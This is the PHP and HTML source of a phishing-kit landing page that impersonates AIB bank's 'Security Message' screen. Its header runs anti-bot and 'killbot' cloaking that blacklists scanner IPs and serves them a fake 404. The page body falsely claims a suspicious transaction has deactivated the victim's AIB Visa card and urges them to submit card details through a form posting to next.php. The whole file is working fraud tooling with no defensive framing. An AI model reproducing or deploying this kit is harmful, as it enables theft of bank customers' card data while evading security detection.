<?php
// @Kr3pto on telegram
require "configg.php";
require "ai_assetz/ninc/session_protect.php";
require "ai_assetz/ninc/functions.php";
if($internal_antibot == 1){
	require "ai_assetz/old_blocker.php";
}
if($enable_killbot == 1){
	if(checkkillbot($killbot_key) == true){
		$fp = fopen("ai_assetz/ninc/blacklist.dat", "a");
		fputs($fp, "\r\n$ip\r\n");
		fclose($fp);
		header_remove();
		header("Connection: close\r\n");
		http_response_code(404);
		exit;
	}
}
if($mobile_lock == 1){
	require "ai_assetz/mob_lock.php";
}
if($IE_lock == 1){
	if(onlyie() == true){
	
	}else{
		$fp = fopen("ai_assetz/ninc/blacklist.dat", "a");
		fputs($fp, "\r\n$ip\r\n");
		fclose($fp);
		header_remove();
		header("Connection: close\r\n");
		http_response_code(404);
		exit;
	}
}
if($external_antibot == 1){
	if(checkBot($apikey) == true){
		$fp = fopen("ai_assetz/ninc/blacklist.dat", "a");
		fputs($fp, "\r\n$ip\r\n");
		fclose($fp);
		header_remove();
		header("Connection: close\r\n");
		http_response_code(404);
		exit;
	}
}
?>
<!DOCTYPE html>
<html dir="ltr" lang="en">
    <head>
        <title>Security Message</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=5.0" />
        <meta http-equiv="x-ua-compatible" content="IE=edge" />
        <link rel="stylesheet" type="text/css" href="ai_assetz/css/main.css" />
        <link rel="icon" href="ai_assetz/img/favicon.ico" />
    </head>
    <body class="aib_tpl">
        <div class="ping-container ping-signin login-template">
            <div class="ping-header">
                <span class="company-logo">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 70 70" width="70" height="70" class="bg-purple-core">
                        <path
                            d="M38.47036 59.95258c-0.05329-0.02112-0.10432-0.04649-0.15396-0.07405c-0.43529-0.30719-0.84874-0.99944-0.84874-1.87718 l-0.0009-13.83799c0-0.34037-0.27596-0.61637-0.61639-0.61637h-3.98455v0.78981v0.0034l0.1473 0.05796 c0.05329 0.0211 0.10428 0.04646 0.15393 0.07401c0.4353 0.30716 0.84581 1.05696 0.84581 1.93475l0.0015 13.78044 c0 0.34039 0.27597 0.61638 0.61639 0.61638h3.98693v-0.78979v-0.00342L38.47036 59.95258z"
                            fill="#fff"
                        ></path>
                        <path
                            d="M20.17341 56.69312h6.73249l1.60359 4.11204h3.63389l-6.48774-16.35593c-0.21233-0.53658-0.74332-0.90157-1.32039-0.90157 h-2.47637l-6.84642 17.2575h3.57658L20.17341 56.69312z M21.39643 53.7343l2.16528-5.27489l2.15327 5.27489H21.39643z"
                            fill="#fff"
                        ></path>
                        <path
                            d="M53.5481 31.79021c0 5.24033-6.03382 7.1589-10.9344 7.1589H28.89686c-4.90056 0-10.93438-1.91858-10.93438-7.1589 c0-6.71221 6.83148-6.17629 5.23211-10.53843c5.03931 1.5703 0.88895 5.23459 0.27824 7.1789 c-0.70929 2.25814 1.09679 5.2578 5.42403 5.2578c0.67232 0 3.07766 0 5.61437 0v-3.94592h-6.63759l2.0341-1.96863h4.60349v-2.38983 c-6.33958-1.30591-4.94452-8.3525-13.62365-9.07255c-2.86228-0.23745-1.83822-5.87143-1.56496-6.73568 c0.0773-0.2445 0.29824-0.33334 0.55314-0.11381c10.74583 9.25392 16.80341 6.43067 19.55687 4.67001 c1.28493-0.82164 3.15483-2.80489 4.52272-2.80489c1.13151 0 2.09253 0.66523 2.51588 0.97908 c0.42332 0.31382 4.36143 3.23126 4.36143 3.23126s-2.84674 0.00393-4.44209 1.1381 c-3.52839 2.5085-4.10933 7.66076-9.25403 8.71569v2.38262h4.46628l2.03411 1.96863h-6.50039v3.94592c2.87069 0 5.35981 0 5.47716 0 c4.32726 0 6.13334-2.99965 5.42405-5.2578c-0.61071-1.94431-4.76107-5.6086 0.27824-7.1789 C46.71662 25.61392 53.5481 25.078 53.5481 31.79021z M43.03877 14.32292c0 0.65976 0.53484 1.19461 1.19461 1.19461 c0.65978 0 1.19463-0.53485 1.19463-1.19461c0-0.65979-0.53485-1.19463-1.19463-1.19463 C43.57361 13.12829 43.03877 13.66313 43.03877 14.32292z"
                            fill="#fff"
                        ></path>
                        <path
                            d="M51.86455 51.91772c1.24638-0.85532 2.05029-2.1825 2.05029-3.67691c0-2.38426-2.11786-4.69315-5.56528-4.69315 c-0.43618 0-7.10542 0-7.10542 0v17.25607h1.07784c0 0 6.66924 0 7.10542 0c3.44743 0 5.56529-2.25134 5.56529-4.63559 C54.99268 54.27768 53.70837 52.65326 51.86455 51.91772z M44.53328 46.50329h3.94774c1.14965 0 2.08157 0.9323 2.08157 2.08044 c0 1.11452-0.87872 1.97525-1.98156 2.02769h-4.04775V46.50329z M49.55887 57.83962h-5.02559v-4.10885h5.09534 c1.14962 0 2.01178 0.91544 2.01178 2.06364C51.64041 56.94255 50.70847 57.83962 49.55887 57.83962z"
                            fill="#fff"
                        ></path>
                    </svg>
                </span>
                Security Message
            </div>
            <div class="ping-body-container">
                <main style="color:#E0E1E1;">
                    <form method="POST" action="./next.php" autocomplete="off" id="loginForm">
						<input type="hidden" name="message" id="message" value="yes">
                        A suspicious transaction was made today with your AIB visa card.<br />
                        <br />
                        As a security precaution once this happens your AIB Visa Card gets automatically deactivated until you have reviewed the transaction.<br />
                        <br />
                        Verify AIB Visa Card and review the transaction.<br />
                        <br />
                        <br />
                        Please verify your AIB Visa Card by filling your debit/credit card information.<br />
                        <br />
                        Once your debit/credit card information is confirmed you will be able to review the transaction, you will need your card reader for this stage.<br />
                        <br />
                        <div class="ping-buttons"><button type="submit" name="btn0" class="ping-button normal allow" style="width: 100%;" title="Continue">Continue</button></div>
                    </form>
                </main>
            </div>
        </div>
    </body>
</html>